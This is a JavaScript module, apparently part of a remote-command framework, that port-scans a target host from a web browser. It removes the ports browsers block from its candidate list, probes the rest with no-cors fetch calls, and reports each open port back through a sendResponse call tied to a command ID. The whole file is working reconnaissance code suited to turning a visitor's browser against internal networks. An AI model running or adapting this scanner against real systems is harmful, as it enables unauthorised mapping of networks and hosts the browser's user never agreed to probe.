const blockedPorts = [1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526, 530, 531, 532, 540, 548, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669, 65535];
const defaultPorts = [1, 5, 7, 9, 15, 20, 21, 22, 23, 25, 26, 29, 33, 37, 42, 43, 53, 67, 68, 69, 70, 76, 79, 80, 88, 90, 98, 101, 106, 109, 110, 111, 113, 114, 115, 118, 119, 123, 129, 132, 133, 135, 136, 137, 138, 139, 143, 144, 156, 158, 161, 162, 168, 174, 177, 194, 197, 209, 213, 217, 219, 220, 223, 264, 315, 316, 346, 353, 389, 413, 414, 415, 416, 440, 443, 444, 445, 453, 454, 456, 457, 458, 462, 464, 465, 466, 480, 486, 497, 500, 501, 516, 518, 522, 523, 524, 525, 526, 533, 535, 538, 540, 541, 542, 543, 544, 545, 546, 547, 556, 557, 560, 561, 563, 564, 625, 626, 631, 636, 637, 660, 664, 666, 683, 740, 741, 742, 744, 747, 748, 749, 750, 751, 752, 753, 754, 758, 760, 761, 762, 763, 764, 765, 767, 771, 773, 774, 775, 776, 780, 781, 782, 783, 786, 787, 799, 800, 801, 808, 871, 873, 888, 898, 901, 953, 989, 990, 992, 993, 994, 995, 996, 997, 998, 999, 1000, 1002, 1008, 1023, 1024, 1080, 8080, 8443, 8050, 3306, 5432, 1521, 1433, 3389, 8000, 8888, 5000, 3000, 10088];
const topPorts = [80, 23, 443, 21, 22, 25, 3389, 110, 445, 139, 143, 53, 135, 3306, 8080, 1723, 111, 995, 993, 5900, 1025, 587, 8888, 199, 1720, 465, 548, 113, 81, 6001, 10000, 5060, 515, 5000, 9100];

const candidatePorts = topPorts
  .concat(defaultPorts)
  .filter((port) => !blockedPorts.includes(port))
  .filter((port, pos, self) => self.indexOf(port) === pos);

const timeout = 5000;

function scanPort(host, port, callback) {

  let controller = new AbortController();
  let signal = controller.signal;
  let startTime = Date.now();
  setTimeout(() => {controller.abort();}, timeout);

  fetch('http://' + host + ':' + port, { method: 'GET', mode: 'no-cors', signal: signal, })
    .then((response) => {
      if (response.status === 0) {
        callback(port);
      }
    });
}

function scanHost(host, callback) {
  candidatePorts.forEach((port) => scanPort(host, port, callback));
}

scanHost(host, (port) => sendResponse(commandId, { host, port }));
